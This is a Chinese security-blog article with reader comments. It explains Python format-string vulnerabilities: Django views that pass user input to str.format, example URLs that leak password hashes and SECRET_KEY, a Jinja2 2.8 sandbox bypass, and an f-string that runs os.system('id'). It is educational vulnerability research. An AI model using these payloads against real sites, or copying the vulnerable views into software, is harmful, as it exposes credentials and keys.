phithon / 2017-01-04 11:33:00 / 浏览数 10015 技术文章 技术文章 顶(1) 踩(0)

# Python 格式化字符串漏洞 (Django为例)

在C语言里有一类特别有趣的漏洞,格式化字符串漏洞。轻则破坏内存,重则读写任意地址内容,二进制的内容我就不说了,说也不懂,分享个链接 https://github.com/shiyanlou/seedlab/blob/master/formatstring.md

### Python中的格式化字符串

Python中也有格式化字符串的方法,在Python2老版本中使用如下方法格式化字符串:

```
"My name is %s" % ('phithon', )
"My name is %(name)%" % {'name':'phithon'}
```

后面为字符串对象增加了format方法,改进后的格式化字符串用法为:

```
"My name is {}".format('phithon')
"My name is {name}".format(name='phithon')
```

很多人一直认为前后两者的差别,仅仅是换了一个写法而已,但实际上format方法已经包罗万象了。文档在此: https://docs.python.org/3.6/library/string.html#formatstrings

#### 举一些例子吧:

上述用法在Python2.7和Python3均可行,所以可以说是一个通用用法。

### 格式化字符串导致的敏感信息泄露漏洞

那么,如果格式化字符串被控制,会发送什么事情?

我的思路是这样,首先我们暂时无法通过格式化字符串来执行代码,但我们可以利用格式化字符串中的"获取对象属性"、"获取数组数值"等方法来寻找、取得一些敏感信息、

以Django为例,如下的view:

```
def view(request, *args, **kwargs):
   template = 'Hello {user}, This is your email: ' + request.GET.get('email')
   return HttpResponse(template.format(user=request.user))
```

### 原意为显示登陆用户传入的email地址:

但因为我们控制了格式化字符串的一部分,将会导致一些意料之外的问题。最简单的,比如:

输出了当前已登陆用户哈希过的密码。看一下为什么会出现这样的问题:user是当前上下文中仅有的一个变量,也就是format函数传入的user=request.user, Django

所以,{user.password}实际上就是输出了request.user.password。

#### 如果改动一下view:

```
def view(request, *args, **kwargs):
    user = get_object_or_404(User, pk=request.GET.get('uid'))
    template = 'This is {user}\'s email: ' + request.GET.get('email')
    return HttpResponse(template.format(user=user))
```

### 将导致一个任意用户密码泄露的漏洞:

### 利用格式化字符串漏洞泄露Django配置信息

上述任意密码泄露的案例可能过于理想了,我们还是用最先的那个案例:

```
def view(request, *args, **kwargs):
   template = 'Hello {user}, This is your email: ' + request.GET.get('email')
   return HttpResponse(template.format(user=request.user))
```

我能够获取到的变量只有request.user,这种情况下怎么利用呢?

我随便列出两个,还有几个更有意思的我暂时不说:

Django是一个庞大的框架,其数据库关系错综复杂,我们其实是可以通过属性之间的关系去一点点挖掘敏感信息。但Django仅仅是一个框架,在没有目标源码的情况下很对

所以,思路就很明确了:我们只需要通过某种方式,找到Django默认应用admin的model,再通过这个model获取settings对象,进而获取数据库账号密码、Web加密密钥

http://localhost:8000/?email={user.groups.model.\_meta.app\_config.module.admin.settings.SECRET\_KEY}

http://localhost:8000/?email={user.user\_permissions.model.\_meta.app\_config.module.admin.settings.SECRET\_KEY}

经过翻找,我发现Django自带的应用"admin"(也就是Django自带的后台)的models.py中导入了当前网站的配置文件:

# Jinja 2.8.1 模板沙盒绕过

字符串格式化漏洞造成了一个实际的案例——Jinja模板的沙盒绕过( https://www.palletsprojects.com/blog/jinja-281-released/ )

#### Jinja2是一个在Python

web框架中使用广泛的模板引擎,可以直接被被Flask/Django等框架引用。Jinja2在防御SSTI(模板注入漏洞)时引入了沙盒机制,也就是说即使模板引擎被用户所控制,其

但由于format带来的字符串格式化漏洞,导致在Jinja2.8.1以前的沙盒可以被绕过,进而读取到配置文件等敏感信息。

### 大家可以使用pip安装Jinja2.8:

```
pip install https://github.com/pallets/jinja/archive/2.8.zip
```

### 并尝试使用Jinja2的沙盒来执行format字符串格式化漏洞代码:

```
>>> from jinja2.sandbox import SandboxedEnvironment
>>> env = SandboxedEnvironment()
>>> class User(object):
...    def __init__(self, name):
...    self.name = name
...
>>> t = env.from_string(
...    '{{ "{0.__class_.__init__.__globals__}".format(user) }}')
>>> t.render(user=User('joe'))
```

成功读取到当前环境所有变量 $\_$ globals $\_$ ,如果当前环境导入了settings或其他敏感配置项,将导致信息泄露漏洞:

相比之下,Jinja2.8.1修复了该漏洞,则会抛出一个SecurityError异常:

# f修饰符与任意代码执行

在PEP 498中引入了新的字符串类型修饰符:f或F,用f修饰的字符串将可以执行代码。文档在此 https://www.python.org/dev/peps/pep-0498/

### 用docker体验一下:

```
docker pull python:3.6.0-slim
docker run -it --rm --name py3.6 python:3.6.0-slim bash
pip install ipython
ipython

# ######ipython
python -c "f'''{__import__('os').system('id')}'''"
```

可见,这种代码执行方法和PHP中的<?php &quot;\${@phpinfo()}&quot;;
?&gt;很类似,这是Python中很少有的几个能够直接将字符串转变成的代码的方式之一,这将导致很多"舶来"漏洞。

举个栗子吧,有些开发者喜欢用eval的方法来解析json:

在有了f字符串后,即使我们不闭合双引号,也能插入任意代码了:

不过实际利用中并不会这么简单,关键问题还在于:Python并没有提供一个方法,将普通字符串转换成f字符串。

但从上图中的eval,到Python模板中的SSTI,有了这个新方法,可能都将有一些突破吧,这个留给大家分析了。

另外,PEP 498在Python3.6中才被实现,在现在看来还不算普及,但我相信之后会有一些由于该特性造成的实际漏洞案例。

# 点击收藏 | 1 关注 | 0

上一篇:先知安全技术社区与嘶吼RoarTa... 下一篇:火眼分析工具FLARE-QDB介绍

#### 1. 9条回复



phithon 2017-01-04 11:41:23

又是一个ctf考点,拿笔记。

1回复Ta



<u>紫霞仙子</u> 2017-01-04 12:09:13

好文!学习了

0 回复Ta



安全小飞侠 2017-01-04 16:37:29

很有意思的漏洞和分析

0 回复Ta



xunnun 2017-01-05 02:49:17

user.username

0 回复Ta



wolf 2017-01-05 03:33:45

p牛出品 必为精品

0 回复Ta



scriptkid 2017-01-06 03:13:24

P牛精品文系列, 收

0 回复Ta



hackoflpf 2017-02-06 08:56:01

这个和windows的完全不一样啊,不可同日而语

0 回复Ta



<u>酷帥王子</u> 2017-11-29 10:49:55

昨天刚检测两个python网站,什么漏洞没检测出来,就检测到上传漏洞可以上传Py马但是上传上去访问不解析,提示下载,哎!

0 回复Ta



<u>酷帥王子</u> 2017-11-29 10:50:37

very good!昨天刚检测两个python网站,dj写的,很安全,xss都被转义,注入也没,唯一一个上传可以上传py但是访问提示下载,目录没有解析权限 0 回复Ta

登录 后跟帖

先知社区

现在登录

热门节点

技术文章

社区小黑板

目录

RSS <u>关于社区</u> 友情链接 社区小黑板